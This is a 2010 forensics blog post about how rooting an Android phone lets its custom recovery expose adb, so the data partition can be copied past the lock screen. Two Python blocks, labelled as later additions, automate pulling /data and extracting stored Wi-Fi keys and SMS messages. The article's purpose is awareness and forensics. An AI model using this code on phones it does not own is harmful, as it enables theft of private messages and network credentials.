The Risk of Rooting

    Posted on October 26, 2010 by Lee Whitfield in Technical Articles.

    If I were to say the name ‘Linus’ and your first reaction was ‘Torvalds’ then you are a monumental geek. You make me proud. If you thought ‘Peanuts’ then you’re still a geek, just not quite as serious a case.

    Linus, from the Peanuts comic strip, kept a tight grip on his security blanket. If anything happened to said blanket he went somewhat off the deep end: he felt as if his world were ending and that nothing could ever make it feel safe again.

    Passwords and keys are the grown-up versions of security blankets.

    We carry our phones everywhere, regardless of their content. Our phones may contain confidential emails, embarrassing pictures and videos (such as this one… http://www.youtube.com/watch?v=vT1CVFaNEbA), and they may even hold our deepest, darkest secrets; things that we would never want others to uncover. Thankfully we password protect our phones so that no-one else can find out. Sadly these security blankets can often have large holes.

    Typically, to get at the data on an Android phone someone would need the phone in hand, would need it to have no passcode or pattern lock, and would then turn on USB Debugging in the settings. That exposes the Android Debug Bridge (adb), and once someone has adb access to your phone all bets are off: the device can be exploited and all of its data pulled down onto a computer. The easy way to stop this? Lock your phone so no one else can get at the contents. It is very difficult to bypass a lock on an Android device, especially on devices running 2.0 and up. However, if you like to tinker with your phone, root it and install custom firmware, you are playing with fire.

    I rooted my phone a few weeks back so that I could get the Froyo upgrade (2.2) before T-Mobile got to it and stripped out all of the good stuff. I downloaded an exploit package that let me easily replace the phone’s recovery image, making it possible to install a ‘cooked’ ROM. After some experimentation I discovered that the new recovery gave me adb access without ever booting into the operating system. From there I was able to mount the ‘data’ partition of the phone and download its entire contents to my computer. I then turned the phone back on and, voilà, the lock screen appeared as if nothing had happened.
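    A check for the condition just described, added here as an example rather than code from the original post: it asks adb which devices are attached and reports any phone that is answering from its recovery image, a state a stock recovery never gets into because it does not start adbd. It assumes the Android SDK’s adb binary is on the PATH and that the phone is sitting at its recovery screen; the sample adb output and serial number are constructed, and the pull_userdata helper mirrors the mount-then-pull sequence from the post and assumes the recovery’s fstab knows the data partition.

```python
"""Tell whether a phone's recovery image answers adb, the condition the
post describes, and optionally pull the data partition from it.

Added example, not code from the original post. Assumes the Android
SDK's `adb` binary is on PATH and that the phone is sitting at its
recovery screen when the script runs.
"""
import shutil
import subprocess
import sys

# Constructed sample of `adb devices` output for a phone whose
# third-party recovery runs adbd. The serial number is made up.
SAMPLE_ADB_DEVICES = (
    "List of devices attached\n"
    "HT0B3NX01234\trecovery\n"
    "\n"
)


def parse_adb_devices(output):
    """Return {serial: state} from the text printed by `adb devices`.

    adb reports 'device' for a booted OS with USB debugging on,
    'recovery' for a recovery image running adbd, and 'offline' when
    the daemon sees the phone but cannot talk to it.
    """
    devices = {}
    for line in output.splitlines():
        line = line.strip()
        # Skip the header, blank lines and adb's "* daemon ..." chatter.
        if not line or line.startswith(("List of devices", "*")):
            continue
        parts = line.split()
        if len(parts) >= 2:
            devices[parts[0]] = parts[1]
    return devices


def exposed_in_recovery(devices):
    """Serials that answer adb while in recovery, i.e. before any lock screen.

    A stock recovery does not start adbd, so a phone listed here is in
    the state the post warns about.
    """
    return sorted(s for s, state in devices.items() if state == "recovery")


def pull_userdata(serial, dest="phone-data"):
    """Mount /data inside the recovery and copy it to the computer.

    Mirrors the post's sequence (adb shell, mount the data partition,
    adb pull). Assumes the recovery's fstab knows /data. Needs a real
    phone and is never called by the test.
    """
    base = ["adb", "-s", serial]
    subprocess.run(base + ["shell", "mount", "/data"], check=False)
    subprocess.run(base + ["pull", "/data", dest], check=True)


if __name__ == "__main__":
    if shutil.which("adb") is None:
        sys.exit("adb not found on PATH")
    out = subprocess.run(["adb", "devices"], capture_output=True,
                         text=True, check=True).stdout
    exposed = exposed_in_recovery(parse_adb_devices(out))
    if not exposed:
        print("no attached phone is answering adb from recovery")
    for serial in exposed:
        print(f"{serial}: recovery exposes adb without the OS booting")
        if "--pull" in sys.argv[1:]:
            pull_userdata(serial)
```

    Run it with the phone at its recovery screen; a phone that shows up as exposed is one whose lock screen never gets a chance to run. Pass --pull to reproduce the copy the post describes against your own device.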

    Back at my computer I started to look at the extracted data. I found my text messages, call logs, calendar items, email messages, Facebook and Twitter updates, internet history, and the list goes on. I was also able to find both the SSID and the key for every wireless network my phone had ever been associated with. This meant that not only my own home network was potentially compromised, but my work network too! My whole life was laid bare for anyone to see, assuming they could get the phone away from me. Bad? Yes, but not the end of the world, because my private life really isn’t that interesting. However, if my phone bill suddenly tripled or quadrupled I could be in trouble!
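    To show what the pulled data tree actually gives up, here is an added example (not the post’s code) that reads two of the items listed above: the Wi-Fi supplicant configuration, which on Android 2.x lives at /data/misc/wifi/wpa_supplicant.conf and holds each SSID with its key in clear text, and the SMS store at /data/data/com.android.providers.telephony/databases/mmssms.db. The config text, the phone number and messages, and the cut-down sms table are all constructed here; the real database has many more columns than the four used.

```python
"""Read two of the files the post found in the pulled /data tree: the
Wi-Fi supplicant config (SSIDs and keys) and the SMS database.

Added example, not code from the original post. Paths are those of
Android 2.x: /data/misc/wifi/wpa_supplicant.conf and
/data/data/com.android.providers.telephony/databases/mmssms.db. The
sample config and the in-memory database are constructed with a
minimal subset of the real schema.
"""
import sqlite3

# Constructed sample in wpa_supplicant.conf syntax. Android stores the
# passphrase in clear text inside network={...} blocks; a psk without
# quotes is the derived 256-bit PMK as 64 hex digits, which still joins
# the network on its own.
SAMPLE_WPA_CONF = """\
ctrl_interface=eth0
update_config=1

network={
    ssid="HomeNet"
    psk="correct horse battery staple"
    key_mgmt=WPA-PSK
    priority=2
}

network={
    ssid="OfficeWLAN"
    psk=00112233445566778899aabbccddeeff00112233445566778899aabbccddeeff
    key_mgmt=WPA-PSK
}

network={
    ssid="CoffeeShop"
    key_mgmt=NONE
}
"""


def parse_wpa_supplicant(text):
    """Return a list of dicts, one per network={...} block."""
    networks = []
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("network={"):
            current = {}
        elif line == "}" and current is not None:
            networks.append(current)
            current = None
        elif current is not None and "=" in line:
            key, value = line.split("=", 1)
            # Quoted values are literal strings; an unquoted psk is the hex PMK.
            current[key] = value.strip('"')
    return networks


def wifi_credentials(text):
    """(ssid, secret) pairs for every network that has a key stored."""
    return [(n["ssid"], n["psk"]) for n in parse_wpa_supplicant(text)
            if "psk" in n]


def build_sample_mmssms_db():
    """In-memory stand-in for mmssms.db with the columns used below."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE sms (_id INTEGER PRIMARY KEY, address TEXT, "
               "date INTEGER, type INTEGER, body TEXT)")
    # type 1 = received, 2 = sent, as in the telephony provider.
    db.executemany(
        "INSERT INTO sms (address, date, type, body) VALUES (?, ?, ?, ?)",
        [("+15550100", 1288000000000, 1, "Gate code is 4471"),
         ("+15550100", 1288000060000, 2, "Thanks, see you at 7")])
    db.commit()
    return db


def read_sms(db):
    """Messages as (direction, address, body) in time order."""
    rows = db.execute(
        "SELECT type, address, body FROM sms ORDER BY date").fetchall()
    return [("received" if t == 1 else "sent", addr, body)
            for t, addr, body in rows]


if __name__ == "__main__":
    for ssid, secret in wifi_credentials(SAMPLE_WPA_CONF):
        print(f"{ssid}: {secret}")
    for direction, address, body in read_sms(build_sample_mmssms_db()):
        print(f"[{direction}] {address}: {body}")
```

    Against a real pull, point parse_wpa_supplicant at the file contents and sqlite3.connect at the copied mmssms.db; nothing in either file is protected beyond the filesystem permissions that adb-from-recovery has already stepped around.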

    I found that turning off the screen lock is a straightforward process that takes only a couple of minutes once access to the phone has been established. Full access to my phone is there for anyone who can lay their hands on it, all because I rooted it. Yes, I was the weak link in the phone’s security, not Google. If I hadn’t rooted my phone the process of retrieving the data would have been far more difficult.

    The other problem is that locking your phone isn’t going to stop anyone from simply popping out the memory card and walking away with your photographs and videos. Android still has no way of encrypting the memory card so that it can’t be read elsewhere. Another potential hole in the security blanket.

    What have I done now? I’ve gone back to the stock HTC ROM for my HTC Desire. This lets me get the latest OS upgrades first and replaces the modified recovery with the standard one, which does not expose adb. Would I recommend everyone else do the same? It’s entirely up to you.

    Also, for those iPhone users laughing at the ‘poor security’ of Android phones take a look at the link below. I guarantee you’ll hold on to your iPhone a little tighter in the future. http://www.engadget.com/2010/10/25/ios-4-1-glitch-lets-you-bypass-lock-screen-to-access-phone-app/

3 Responses so far.

  1. […] This post was mentioned on Twitter by sansforensics, Yiorgos Adamopoulos, Lee Whitfield, RogueUniversity, Cyber Informer and others. Cyber Informer said: The #Risk of Rooting: [#forensic4cast.com] If I were to say the name #Linus and your first reaction is Torvalds then… http://dlvr.it/7Z0yB […]

  2. david nardoni says:

    Lee,

    Great post. Another thing is that Android 2.2, I believe, allows you to now store your apps on the SD card. So if people are doing that, physical access could allow someone to pop out the SD card and walk off with the apps and their data. Also, as I am sure you are aware, there are tools to bypass the passcode on the iPhone today. I am sure that if there are not already, there will be tools to bypass the passcode on Android as well.

    The bypass on the iPhone only gets you access to the contacts and recent phone calls, which could be great for Law Enforcement who just need a quick look at what calls have been made.

    Good security controls on mobile devices are only a thought at this point. They have yet to be born. We shall see if and how they materialize.

    Great post!

    Dave Nardoni

  3. […] the digital forensics industry, a good example of this was Lee Whitfield’s post about the dangers of rooting one’s smartphone. Lee linked to an article that contained — guess […]
